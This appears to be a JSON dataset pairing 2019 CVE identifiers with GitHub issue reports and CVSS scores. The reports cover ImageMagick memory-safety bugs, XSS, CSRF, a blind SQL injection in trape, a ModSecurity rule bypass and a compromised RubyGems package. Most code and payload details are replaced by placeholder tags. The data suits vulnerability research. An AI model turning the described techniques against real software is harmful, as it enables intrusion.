        "description": "heap buffer overflow at APITAG APITAG in APITAG Prerequisites x] I have written a descriptive issue title [x] I have verified that I am using the latest version of APITAG [x] I have searched [open URLTAG and closed URLTAG issues to ensure it has not already been reported Description APITAG There's a heap buffer overflow at APITAG APITAG in APITAG Steps to Reproduce APITAG APITAG version: Version: APITAG NUMBERTAG Q NUMBERTAG FILETAG Environment APITAG system, version and so on): Description: Ubuntu NUMBERTAG LTS Release NUMBERTAG Codename: bionic Additional information: CC=clang NUMBERTAG CXX=clang NUMBERTAG configure disable openmp APITAG",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
        "severity": "HIGH",
        "baseScore": 8.8,
        "impactScore": 5.9,
        "exploitabilityScore": 2.8
    },
    {
        "CVE_ID": "CVE-2019-13300",
        "Issue_Url_old": "https://github.com/ImageMagick/ImageMagick/issues/1586",
        "Issue_Url_new": "https://github.com/imagemagick/imagemagick/issues/1586",
        "Repo_new": "imagemagick/imagemagick",
        "Issue_Created_At": "2019-06-10T15:57:48Z",
        "description": "heap buffer overflow in APITAG Prerequisites x] I have written a descriptive issue title [x] I have verified that I am using the latest version of APITAG [x] I have searched [open URLTAG and closed URLTAG issues to ensure it has not already been reported Description APITAG There is a heap buffer overflow vulnerability in APITAG in . APITAG Steps to Reproduce APITAG APITAG version: Version: APITAG NUMBERTAG Q NUMBERTAG Environment APITAG system, version and so on): Description: Ubuntu NUMBERTAG LTS Release NUMBERTAG Codename: bionic Additional information: CC=clang NUMBERTAG CXX=clang NUMBERTAG APITAG",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
        "severity": "HIGH",
        "baseScore": 8.8,
        "impactScore": 5.9,
        "exploitabilityScore": 2.8
    },
    {
        "CVE_ID": "CVE-2019-13301",
        "Issue_Url_old": "https://github.com/ImageMagick/ImageMagick/issues/1589",
        "Issue_Url_new": "https://github.com/imagemagick/imagemagick/issues/1589",
        "Repo_new": "imagemagick/imagemagick",
        "Issue_Created_At": "2019-06-11T05:31:32Z",
        "description": "heap use after free in APITAG and double free in APITAG of APITAG Prerequisites x] I have written a descriptive issue title [x] I have verified that I am using the latest version of APITAG [x] I have searched [open URLTAG and closed URLTAG issues to ensure it has not already been reported Description APITAG There are a heap use after free(sometimes heap buffer overflow) vulnerability in APITAG in . APITAG and a double free bug in APITAG APITAG with the same input. For each run, different bugs are triggered so please run the command for many times. related NUMBERTAG URLTAG Steps to Reproduce APITAG Version: APITAG NUMBERTAG Q NUMBERTAG APITAG version: Environment APITAG system, version and so on): Description: Ubuntu NUMBERTAG LTS Release NUMBERTAG Codename: bionic Additional information: CC=clang NUMBERTAG CXX=clang NUMBERTAG APITAG",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
        "severity": "MEDIUM",
        "baseScore": 6.5,
        "impactScore": 3.6,
        "exploitabilityScore": 2.8
    },
    {
        "CVE_ID": "CVE-2019-13301",
        "Issue_Url_old": "https://github.com/ImageMagick/ImageMagick/issues/1585",
        "Issue_Url_new": "https://github.com/imagemagick/imagemagick/issues/1585",
        "Repo_new": "imagemagick/imagemagick",
        "Issue_Created_At": "2019-06-10T14:34:22Z",
        "description": "heap buffer overflow in APITAG Prerequisites x] I have written a descriptive issue title [x] I have verified that I am using the latest version of APITAG [x] I have searched [open URLTAG and closed URLTAG issues to ensure it has not already been reported Description There is a heap buffer overflow vulnerability in APITAG in . APITAG It sometimes doesn't occur so needs to be executed for several times. I found that this bug is not reproduced but it is reproduced with certain arguments. closed report URLTAG APITAG Steps to Reproduce APITAG APITAG version: Version: APITAG NUMBERTAG Q NUMBERTAG Environment APITAG system, version and so on): Description: Ubuntu NUMBERTAG LTS Release NUMBERTAG Codename: bionic Additional information: CC=clang NUMBERTAG CXX=clang NUMBERTAG APITAG",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
        "severity": "MEDIUM",
        "baseScore": 6.5,
        "impactScore": 3.6,
        "exploitabilityScore": 2.8
    },
    {
        "CVE_ID": "CVE-2019-13302",
        "Issue_Url_old": "https://github.com/ImageMagick/ImageMagick/issues/1597",
        "Issue_Url_new": "https://github.com/imagemagick/imagemagick/issues/1597",
        "Repo_new": "imagemagick/imagemagick",
        "Issue_Created_At": "2019-06-17T03:51:17Z",
        "description": "heap buffer overflow in APITAG in APITAG Prerequisites x] I have written a descriptive issue title [x] I have verified that I am using the latest version of APITAG [x] I have searched [open URLTAG and closed URLTAG issues to ensure it has not already been reported Description APITAG There's a heap buffer overflow in APITAG in APITAG Steps to Reproduce APITAG APITAG version: Version: APITAG NUMBERTAG Q NUMBERTAG FILETAG Environment APITAG system, version and so on): Description: Ubuntu NUMBERTAG LTS Release NUMBERTAG Codename: bionic Additional information: CC=clang NUMBERTAG CXX=clang NUMBERTAG configure disable openmp APITAG",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
        "severity": "HIGH",
        "baseScore": 8.8,
        "impactScore": 5.9,
        "exploitabilityScore": 2.8
    },
    {
        "CVE_ID": "CVE-2019-13303",
        "Issue_Url_old": "https://github.com/ImageMagick/ImageMagick/issues/1603",
        "Issue_Url_new": "https://github.com/imagemagick/imagemagick/issues/1603",
        "Repo_new": "imagemagick/imagemagick",
        "Issue_Created_At": "2019-06-18T17:08:25Z",
        "description": "heap buffer overflow in APITAG in APITAG Prerequisites x] I have written a descriptive issue title [x] I have verified that I am using the latest version of APITAG [x] I have searched [open URLTAG and closed URLTAG issues to ensure it has not already been reported Description APITAG There's a heap buffer overflow in APITAG in APITAG I compiled APITAG with disable openmp option. Steps to Reproduce APITAG APITAG version: Version: APITAG NUMBERTAG Q NUMBERTAG FILETAG Environment APITAG system, version and so on): Description: Ubuntu NUMBERTAG LTS Release NUMBERTAG Codename: bionic Additional information: CC=clang NUMBERTAG CXX=clang NUMBERTAG configure disable openmp APITAG",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
        "severity": "HIGH",
        "baseScore": 8.8,
        "impactScore": 5.9,
        "exploitabilityScore": 2.8
    },
    {
        "CVE_ID": "CVE-2019-13304",
        "Issue_Url_old": "https://github.com/ImageMagick/ImageMagick/issues/1614",
        "Issue_Url_new": "https://github.com/imagemagick/imagemagick/issues/1614",
        "Repo_new": "imagemagick/imagemagick",
        "Issue_Created_At": "2019-06-21T06:36:50Z",
        "description": "stack buffer overflow at APITAG in APITAG Prerequisites x] I have written a descriptive issue title [x] I have verified that I am using the latest version of APITAG [x] I have searched [open URLTAG and closed URLTAG issues to ensure it has not already been reported Description APITAG There's a stack buffer overflow at APITAG in APITAG Steps to Reproduce APITAG APITAG version: Version: APITAG NUMBERTAG Q NUMBERTAG FILETAG Environment APITAG system, version and so on): Description: Ubuntu NUMBERTAG LTS Release NUMBERTAG Codename: bionic Additional information: CC=clang NUMBERTAG CXX=clang NUMBERTAG configure disable openmp APITAG",
        "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
        "severity": "HIGH",
        "baseScore": 7.8,
        "impactScore": 5.9,
        "exploitabilityScore": 1.8
    },
    {
        "CVE_ID": "CVE-2019-13305",
        "Issue_Url_old": "https://github.com/ImageMagick/ImageMagick/issues/1613",
        "Issue_Url_new": "https://github.com/imagemagick/imagemagick/issues/1613",
        "Repo_new": "imagemagick/imagemagick",
        "Issue_Created_At": "2019-06-21T06:23:44Z",
        "description": "stack buffer overflow at APITAG in APITAG . Prerequisites x] I have written a descriptive issue title [x] I have verified that I am using the latest version of APITAG [x] I have searched [open URLTAG and closed URLTAG issues to ensure it has not already been reported Description APITAG There's a stack buffer overflow at APITAG in APITAG Steps to Reproduce APITAG APITAG version: Version: APITAG NUMBERTAG Q NUMBERTAG FILETAG Environment APITAG system, version and so on): Description: Ubuntu NUMBERTAG LTS Release NUMBERTAG Codename: bionic Additional information: CC=clang NUMBERTAG CXX=clang NUMBERTAG configure disable openmp APITAG",
        "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
        "severity": "HIGH",
        "baseScore": 7.8,
        "impactScore": 5.9,
        "exploitabilityScore": 1.8
    },
    {
        "CVE_ID": "CVE-2019-13306",
        "Issue_Url_old": "https://github.com/ImageMagick/ImageMagick/issues/1612",
        "Issue_Url_new": "https://github.com/imagemagick/imagemagick/issues/1612",
        "Repo_new": "imagemagick/imagemagick",
        "Issue_Created_At": "2019-06-21T06:13:39Z",
        "description": "stack buffer overflow at APITAG in APITAG Prerequisites x] I have written a descriptive issue title [x] I have verified that I am using the latest version of APITAG [x] I have searched [open URLTAG and closed URLTAG issues to ensure it has not already been reported Description APITAG There's a stack buffer overflow at APITAG in APITAG I think this is related with NUMBERTAG URLTAG , but it was heap and this issue is about the stack buffer overflow. Steps to Reproduce APITAG APITAG version: Version: APITAG NUMBERTAG Q NUMBERTAG FILETAG Environment APITAG system, version and so on): Description: Ubuntu NUMBERTAG LTS Release NUMBERTAG Codename: bionic Additional information: CC=clang NUMBERTAG CXX=clang NUMBERTAG configure disable openmp APITAG",
        "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
        "severity": "HIGH",
        "baseScore": 7.8,
        "impactScore": 5.9,
        "exploitabilityScore": 1.8
    },
    {
        "CVE_ID": "CVE-2019-13307",
        "Issue_Url_old": "https://github.com/ImageMagick/ImageMagick/issues/1615",
        "Issue_Url_new": "https://github.com/imagemagick/imagemagick/issues/1615",
        "Repo_new": "imagemagick/imagemagick",
        "Issue_Created_At": "2019-06-22T02:11:22Z",
        "description": "heap buffer overflow at APITAG in APITAG Prerequisites x] I have written a descriptive issue title [x] I have verified that I am using the latest version of APITAG [x] I have searched [open URLTAG and closed URLTAG issues to ensure it has not already been reported Description APITAG There's a heap buffer overflow at APITAG in APITAG Steps to Reproduce APITAG APITAG version: Version: APITAG NUMBERTAG Q NUMBERTAG FILETAG Environment APITAG system, version and so on): Description: Ubuntu NUMBERTAG LTS Release NUMBERTAG Codename: bionic Additional information: CC=clang NUMBERTAG CXX=clang NUMBERTAG configure disable openmp APITAG",
        "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
        "severity": "HIGH",
        "baseScore": 7.8,
        "impactScore": 5.9,
        "exploitabilityScore": 1.8
    },
    {
        "CVE_ID": "CVE-2019-13308",
        "Issue_Url_old": "https://github.com/ImageMagick/ImageMagick/issues/1595",
        "Issue_Url_new": "https://github.com/imagemagick/imagemagick/issues/1595",
        "Repo_new": "imagemagick/imagemagick",
        "Issue_Created_At": "2019-06-17T02:21:01Z",
        "description": "heap buffer overflow in APITAG in APITAG Prerequisites x] I have written a descriptive issue title [x] I have verified that I am using the latest version of APITAG [x] I have searched [open URLTAG and closed URLTAG issues to ensure it has not already been reported Description APITAG There's a heap buffer overflow in APITAG in APITAG and I compiled the lasted version with disable openmp option. Steps to Reproduce APITAG APITAG version: Version: APITAG NUMBERTAG Q NUMBERTAG FILETAG Environment APITAG system, version and so on): Description: Ubuntu NUMBERTAG LTS Release NUMBERTAG Codename: bionic Additional information: CC=clang NUMBERTAG CXX=clang NUMBERTAG configure disable openmp APITAG",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
        "severity": "HIGH",
        "baseScore": 8.8,
        "impactScore": 5.9,
        "exploitabilityScore": 2.8
    },
    {
        "CVE_ID": "CVE-2019-13309",
        "Issue_Url_old": "https://github.com/ImageMagick/ImageMagick/issues/1616",
        "Issue_Url_new": "https://github.com/imagemagick/imagemagick/issues/1616",
        "Repo_new": "imagemagick/imagemagick",
        "Issue_Created_At": "2019-06-23T08:45:54Z",
        "description": "memory leaks is detected at APITAG Prerequisites x] I have written a descriptive issue title [x] I have verified that I am using the latest version of APITAG [x] I have searched [open URLTAG and closed URLTAG issues to ensure it has not already been reported Description APITAG There's memory leaks in APITAG This issue is maybe related with NUMBERTAG URLTAG . Steps to Reproduce APITAG APITAG version: Version: APITAG NUMBERTAG Q NUMBERTAG FILETAG Environment APITAG system, version and so on): Description: Ubuntu NUMBERTAG LTS Release NUMBERTAG Codename: bionic Additional information: CC=clang NUMBERTAG CXX=clang NUMBERTAG configure disable openmp APITAG",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
        "severity": "MEDIUM",
        "baseScore": 6.5,
        "impactScore": 3.6,
        "exploitabilityScore": 2.8
    },
    {
        "CVE_ID": "CVE-2019-13311",
        "Issue_Url_old": "https://github.com/ImageMagick/ImageMagick/issues/1623",
        "Issue_Url_new": "https://github.com/imagemagick/imagemagick/issues/1623",
        "Repo_new": "imagemagick/imagemagick",
        "Issue_Created_At": "2019-07-01T18:19:43Z",
        "description": "memory leaks is detected at APITAG Prerequisites x] I have written a descriptive issue title [x] I have verified that I am using the latest version of APITAG [x] I have searched [open URLTAG and closed URLTAG issues to ensure it has not already been reported Description APITAG There's memory leaks which are detected at APITAG This maybe relates with NUMBERTAG URLTAG . Steps to Reproduce APITAG APITAG version: APITAG NUMBERTAG Q NUMBERTAG FILETAG Environment APITAG system, version and so on): Description: Ubuntu NUMBERTAG LTS Release NUMBERTAG Codename: bionic Additional information: CC=clang NUMBERTAG CXX=clang NUMBERTAG configure disable openmp without png and I also tested on Ubuntu NUMBERTAG with clang NUMBERTAG and gcc NUMBERTAG APITAG",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
        "severity": "MEDIUM",
        "baseScore": 6.5,
        "impactScore": 3.6,
        "exploitabilityScore": 2.8
    },
    {
        "CVE_ID": "CVE-2019-13339",
        "Issue_Url_old": "https://github.com/bg5sbk/MiniCMS/issues/32",
        "Issue_Url_new": "https://github.com/bg5sbk/minicms/issues/32",
        "Repo_new": "bg5sbk/minicms",
        "Issue_Created_At": "2019-07-04T10:12:43Z",
        "description": "Another XSS found. POC NUMBERTAG Enter setting page FILETAG NUMBERTAG Upload the payload in comment FILETAG NUMBERTAG Then write an article and set the comment code into true and save FILETAG NUMBERTAG When someone is reading the article, there will be FILETAG",
        "vectorString": "CVSS:3.0/AV:N/AC:L/PR:H/UI:R/S:C/C:L/I:L/A:N",
        "severity": "MEDIUM",
        "baseScore": 4.8,
        "impactScore": 2.7,
        "exploitabilityScore": 1.7
    },
    {
        "CVE_ID": "CVE-2019-13351",
        "Issue_Url_old": "https://github.com/xbmc/xbmc/issues/16258",
        "Issue_Url_new": "https://github.com/xbmc/xbmc/issues/16258",
        "Repo_new": "xbmc/xbmc",
        "Issue_Created_At": "2019-06-10T23:45:04Z",
        "description": "Sporadic crash when during on my APITAG due to double APITAG on the same fd in APITAG Bug report Describe the bug Here is a clear and concise description of what the problem is: Kodi crashes sporadically when I turn on my TV and receiver since I upgraded to Ubuntu NUMBERTAG There is a double close somewhere on the APITAG thread which is racing against the APITAG libudev has an assert when close returns EBADF. When I turn the TV on, it triggers udev_enumerate_scan_devices. This has been difficult to debug due to the sporadic nature of the race condition. I've straced kodi NUMBERTAG with APITAG calls, but if I add openat to the list, it disturbs the timing enough that I haven't been able to reproduce with that strace attached. It happens at least NUMBERTAG of the time turning my TV on with no strace attached. Expected Behavior Here is a clear and concise description of what was expected to happen: Kodi should not crash sporadically when turning on my TV. Actual Behavior Kodi crashes sporadically when turning on my TV. Possible Fix To Reproduce Steps to reproduce the behavior NUMBERTAG Boot machine with auto login to kodi. I'm using ALSA HDMI audio. The EDID is fixed NUMBERTAG Turn my TV on. This triggers the receiver on via CEC NUMBERTAG Kodi crashes. Debuglog The debuglog can be found here: APITAG is not on for this log because it disturbs the timing enough to mess with the race condition, and makes it hard to reproduce): FILETAG Stack strace from the core dump, it asserts inside libudev due to the double close on the other thread: FILETAG List of thread names for the tids: FILETAG Tail of the an strace showing the double close on the APITAG thread: FILETAG Screenshots Here are some links or screenshots to help explain the problem: Additional context or screenshots (if appropriate) Here is some additional context or explanation that might help: Your Environment Used Operating system: [ ] Android [ ] iOS [x] Linux [ ] OSX [ ] Raspberry Pi [ ] Windows [ ] Windows UWP Operating system version/name: Ubuntu NUMBERTAG Kodi version NUMBERTAG note: Once the issue is made we require you to update it with new information or Kodi versions should that be required. Team Kodi will consider your problem report however, we will not make any promises the problem will be solved.",
        "vectorString": "CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H",
        "severity": "HIGH",
        "baseScore": 8.1,
        "impactScore": 5.9,
        "exploitabilityScore": 2.2
    },
    {
        "CVE_ID": "CVE-2019-13362",
        "Issue_Url_old": "https://github.com/michaelrsweet/codedoc/issues/5",
        "Issue_Url_new": "https://github.com/michaelrsweet/codedoc/issues/5",
        "Repo_new": "michaelrsweet/codedoc",
        "Issue_Created_At": "2019-07-03T08:29:50Z",
        "description": "stack buffer overflow in codedoc_strlcpy APITAG PATHTAG ./codedoc poc2 FILETAG asan output ERRORTAG gcc output ERRORTAG",
        "vectorString": "CVSS:3.0/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
        "severity": "HIGH",
        "baseScore": 7.8,
        "impactScore": 5.9,
        "exploitabilityScore": 1.8
    },
    {
        "CVE_ID": "CVE-2019-13370",
        "Issue_Url_old": "https://github.com/ignitedcms/ignitedcms/issues/7",
        "Issue_Url_new": "https://github.com/ignitedcms/ignitedcms/issues/7",
        "Repo_new": "ignitedcms/ignitedcms",
        "Issue_Created_At": "2019-07-02T02:36:52Z",
        "description": "A CSRF vulnerability exists. When the administrator logs in, open the POC page constructed by the attacker and a new user will be automatically added. POC\uff1a APITAG APITAG APITAG '', '/') APITAG APITAG APITAG APITAG APITAG APITAG APITAG APITAG APITAG APITAG APITAG APITAG APITAG APITAG APITAG APITAG APITAG",
        "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
        "severity": "HIGH",
        "baseScore": 8.8,
        "impactScore": 5.9,
        "exploitabilityScore": 2.8
    },
    {
        "CVE_ID": "CVE-2019-13391",
        "Issue_Url_old": "https://github.com/ImageMagick/ImageMagick/issues/1588",
        "Issue_Url_new": "https://github.com/imagemagick/imagemagick/issues/1588",
        "Repo_new": "imagemagick/imagemagick",
        "Issue_Created_At": "2019-06-11T03:25:05Z",
        "description": "heap buffer overflow in APITAG or heap use after free in APITAG Prerequisites x] I have written a descriptive issue title [x] I have verified that I am using the latest version of APITAG [x] I have searched [open URLTAG and closed URLTAG issues to ensure it has not already been reported Description APITAG There is a heap buffer overflow in APITAG in . APITAG or a heap use after free in APITAG in APITAG with the same input. Heap buffer overflow sometimes occur and heap use after free is rarely found with the same command. To trigger these bugs, please run the command for many times. Steps to Reproduce APITAG APITAG version: Version: APITAG NUMBERTAG Q NUMBERTAG Environment APITAG system, version and so on): Description: Ubuntu NUMBERTAG LTS Release NUMBERTAG Codename: bionic Additional information: CC=clang NUMBERTAG CXX=clang NUMBERTAG APITAG",
        "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
        "severity": "HIGH",
        "baseScore": 8.8,
        "impactScore": 5.9,
        "exploitabilityScore": 2.8
    },
    {
        "CVE_ID": "CVE-2019-13445",
        "Issue_Url_old": "https://github.com/ros/ros_comm/issues/1738",
        "Issue_Url_new": "https://github.com/ros/ros_comm/issues/1738",
        "Repo_new": "ros/ros_comm",
        "Issue_Created_At": "2019-07-02T21:42:17Z",
        "description": "potential integer overflow. Potentially overflowing expression NUMBERTAG S\" with type \"int NUMBERTAG bits, signed) is evaluated using NUMBERTAG bit arithmetic, and then used in a context that expects an expression of type \"uint NUMBERTAG t NUMBERTAG bits, unsigned). URLTAG To avoid overflow, cast either NUMBERTAG or \"S\" to type \"uint NUMBERTAG t\".",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
        "severity": "CRITICAL",
        "baseScore": 9.8,
        "impactScore": 5.9,
        "exploitabilityScore": 3.9
    },
    {
        "CVE_ID": "CVE-2019-13454",
        "Issue_Url_old": "https://github.com/ImageMagick/ImageMagick/issues/1629",
        "Issue_Url_new": "https://github.com/imagemagick/imagemagick/issues/1629",
        "Repo_new": "imagemagick/imagemagick",
        "Issue_Created_At": "2019-07-07T02:34:55Z",
        "description": "Division by Zero at APITAG Prerequisites x] I have written a descriptive issue title [x] I have verified that I am using the latest version of APITAG [x] I have searched [open URLTAG and closed URLTAG issues to ensure it has not already been reported Description APITAG There's a division by zero at APITAG Steps to Reproduce APITAG columns != next >columns || curr >rows != next >rows NUMBERTAG curr >page.x != next >page.x || curr >page.y != next >page.y NUMBERTAG continue NUMBERTAG APITAG NUMBERTAG if ( bounds.x APITAG delay NUMBERTAG curr >ticks_per_second NUMBERTAG time += next >delay NUMBERTAG next >ticks_per_second NUMBERTAG next >ticks_per_second NUMBERTAG L NUMBERTAG next >delay = time curr >ticks_per_second NUMBERTAG next >iterations = curr >iterations NUMBERTAG images = curr NUMBERTAG oid) APITAG NUMBERTAG APITAG APITAG runtime error: division by zero SUMMARY: APITAG undefined behavior APITAG in APITAG APITAG NUMBERTAG ERROR: APITAG UNKNOWN SIGNAL on unknown address NUMBERTAG pc NUMBERTAG fe NUMBERTAG baee9e7 bp NUMBERTAG ffc NUMBERTAG e NUMBERTAG sp NUMBERTAG ffc NUMBERTAG e NUMBERTAG ec0 T NUMBERTAG fe NUMBERTAG baee9e6 in APITAG APITAG NUMBERTAG fe NUMBERTAG a NUMBERTAG a8 in APITAG APITAG NUMBERTAG fe NUMBERTAG a NUMBERTAG in APITAG APITAG NUMBERTAG fe NUMBERTAG c6aef4 in APITAG APITAG APITAG NUMBERTAG fe NUMBERTAG c6dc NUMBERTAG in APITAG APITAG APITAG NUMBERTAG fe NUMBERTAG d NUMBERTAG e in APITAG APITAG NUMBERTAG in APITAG APITAG NUMBERTAG e1 in main APITAG NUMBERTAG fe NUMBERTAG b NUMBERTAG in __libc_start_main PATHTAG NUMBERTAG b NUMBERTAG in _start ( PATHTAG ) APITAG can not provide additional info. SUMMARY: APITAG UNKNOWN SIGNAL APITAG in APITAG NUMBERTAG ABORTING ` System Configuration APITAG APITAG version: Version: APITAG NUMBERTAG Q NUMBERTAG FILETAG Environment APITAG system, version and so on): Description: Ubuntu NUMBERTAG LTS Release NUMBERTAG Codename: bionic Additional information: CC=clang NUMBERTAG CXX=clang NUMBERTAG CFLAGS=\" fsanitize=address,undefined g\" CXXFLAGS=\" fsanitize=address,undefined g\" ./configure disable openmp without png APITAG",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
        "severity": "MEDIUM",
        "baseScore": 6.5,
        "impactScore": 3.6,
        "exploitabilityScore": 2.8
    },
    {
        "CVE_ID": "CVE-2019-13464",
        "Issue_Url_old": "https://github.com/SpiderLabs/owasp-modsecurity-crs/issues/1386",
        "Issue_Url_new": "https://github.com/spiderlabs/owasp-modsecurity-crs/issues/1386",
        "Repo_new": "spiderlabs/owasp-modsecurity-crs",
        "Issue_Created_At": "2019-05-04T03:56:08Z",
        "description": "Bypass rule PHP Script Uploads with id NUMBERTAG and id NUMBERTAG Type of Issue Incorrect blocking (false positive) Description I bypassed this pull issue NUMBERTAG URLTAG In rule id NUMBERTAG This behavior return true ERRORTAG But, by replacing APITAG to APITAG CODETAG in my php application, that understanding APITAG is APITAG request: APITAG response: FILETAG And a rule id NUMBERTAG is the same Your Environment I tested my ubuntu NUMBERTAG PHP version NUMBERTAG and the latest version crs APITAG Confirmation [X] I have removed any personal data (email addresses, IP addresses, passwords, domain names) from any logs posted.",
        "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N",
        "severity": "HIGH",
        "baseScore": 7.5,
        "impactScore": 3.6,
        "exploitabilityScore": 3.9
    },
    {
        "CVE_ID": "CVE-2019-13465",
        "Issue_Url_old": "https://github.com/ros/ros_comm/issues/1748",
        "Issue_Url_new": "https://github.com/ros/ros_comm/issues/1748",
        "Repo_new": "ros/ros_comm",
        "Issue_Created_At": "2019-07-09T17:55:55Z",
        "description": "Coverity invalidate iterator cause overflow. When ROS_ASSERT_ENABLED is not defined the following iterator will overflow: URLTAG",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:N/I:N/A:H",
        "severity": "HIGH",
        "baseScore": 8.6,
        "impactScore": 4.0,
        "exploitabilityScore": 3.9
    },
    {
        "CVE_ID": "CVE-2019-13488",
        "Issue_Url_old": "https://github.com/jofpin/trape/issues/169",
        "Issue_Url_new": "https://github.com/jofpin/trape/issues/169",
        "Repo_new": "jofpin/trape",
        "Issue_Created_At": "2019-06-15T05:39:49Z",
        "description": "Stored XSS in PATHTAG Overview User input is embedded in admin interface through APITAG unsafe APITAG method. This leads to Cross site Scripting attack. The vulnerability is in URLTAG The vulnerable parameters are ERRORTAG sent in APITAG request. Proof of concept NUMBERTAG APITAG NUMBERTAG Send the following HTTP request ERRORTAG NUMBERTAG Open the Control Panel link , we see APITAG box.",
        "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N",
        "severity": "MEDIUM",
        "baseScore": 6.1,
        "impactScore": 2.7,
        "exploitabilityScore": 2.8
    },
    {
        "CVE_ID": "CVE-2019-13489",
        "Issue_Url_old": "https://github.com/jofpin/trape/issues/168",
        "Issue_Url_new": "https://github.com/jofpin/trape/issues/168",
        "Repo_new": "jofpin/trape",
        "Issue_Created_At": "2019-06-14T09:39:23Z",
        "description": "Blind SQL injection in core/db.py. Description User input is not escaped when building SQL command. As a result, the application is vulnerable to SQL injection attack. Proof of concept NUMBERTAG APITAG NUMBERTAG Send the following HTTP request CODETAG NUMBERTAG The final SQL query is: CODETAG NUMBERTAG If the condition inside APITAG is true, APITAG is executed, which leads to large delay and/or returned status code of NUMBERTAG This enable attacker to run a blind SQL injection attack. Impact Dump the whole database of trape . How to fix The vulnerability is in URLTAG The APITAG variable is manually concatenated to the SQL command. To fix this, developer can whitelist APITAG variable before constructing SQL query.",
        "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
        "severity": "CRITICAL",
        "baseScore": 9.8,
        "impactScore": 5.9,
        "exploitabilityScore": 3.9
    },
    {
        "CVE_ID": "CVE-2019-13506",
        "Issue_Url_old": "https://github.com/Rich-Harris/devalue/issues/19",
        "Issue_Url_new": "https://github.com/rich-harris/devalue/issues/19",
        "Repo_new": "rich-harris/devalue",
        "Issue_Created_At": "2019-04-12T21:54:12Z",
        "description": "Security: APITAG XSS. As shown in URLTAG and URLTAG devalue exposes a XSS vulnerability, when an object key contains unsafe characters. From the issue: > I think it should be safe to use the same approach as in serialize javascript to replace unsafe characters: URLTAG",
        "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N",
        "severity": "MEDIUM",
        "baseScore": 6.1,
        "impactScore": 2.7,
        "exploitabilityScore": 2.8
    },
    {
        "CVE_ID": "CVE-2019-13566",
        "Issue_Url_old": "https://github.com/ros/ros_comm/issues/1735",
        "Issue_Url_new": "https://github.com/ros/ros_comm/issues/1735",
        "Repo_new": "ros/ros_comm",
        "Issue_Created_At": "2019-07-02T19:28:39Z",
        "description": "Coverity report potential string overflow in APITAG NUMBERTAG Event fixed_size_dest: You might overrun the NUMBERTAG character fixed size string \"namebuf\" by copying the return value of \"inet_ntoa\" without checking the length. URLTAG",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
        "severity": "CRITICAL",
        "baseScore": 9.8,
        "impactScore": 5.9,
        "exploitabilityScore": 3.9
    },
    {
        "CVE_ID": "CVE-2019-13566",
        "Issue_Url_old": "https://github.com/ros/ros_comm/issues/1752",
        "Issue_Url_new": "https://github.com/ros/ros_comm/issues/1752",
        "Repo_new": "ros/ros_comm",
        "Issue_Created_At": "2019-07-10T19:24:37Z",
        "description": "Potential buffer overflow. Copy the Internet host address of address >sin_addr to local variable with checking the buffer length, can cause potential buffer overflow if using a IP address with a long hostname that is obtained via a reverse DNS lookup URLTAG",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
        "severity": "CRITICAL",
        "baseScore": 9.8,
        "impactScore": 5.9,
        "exploitabilityScore": 3.9
    },
    {
        "CVE_ID": "CVE-2019-13589",
        "Issue_Url_old": "https://github.com/rubygems/rubygems.org/issues/2051",
        "Issue_Url_new": "https://github.com/rubygems/rubygems.org/issues/2051",
        "Repo_new": "rubygems/rubygems.org",
        "Issue_Created_At": "2019-07-08T20:44:12Z",
        "description": "paranoid2 version NUMBERTAG is compromised and a malware, please yank!. Hi, paranoid2 URLTAG version NUMBERTAG is compromised and a malware. Please remove it! The attack is similar to the recently reported FILETAG and the code snippet is located at: PATHTAG APITAG URLTAG FILETAG",
        "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
        "severity": "CRITICAL",
        "baseScore": 9.8,
        "impactScore": 5.9,
        "exploitabilityScore": 3.9
    },
    {
        "CVE_ID": "CVE-2019-13611",
        "Issue_Url_old": "https://github.com/miguelgrinberg/python-engineio/issues/128",
        "Issue_Url_new": "https://github.com/miguelgrinberg/python-engineio/issues/128",
        "Repo_new": "miguelgrinberg/python-engineio",
        "Issue_Created_At": "2019-07-14T11:07:57Z",
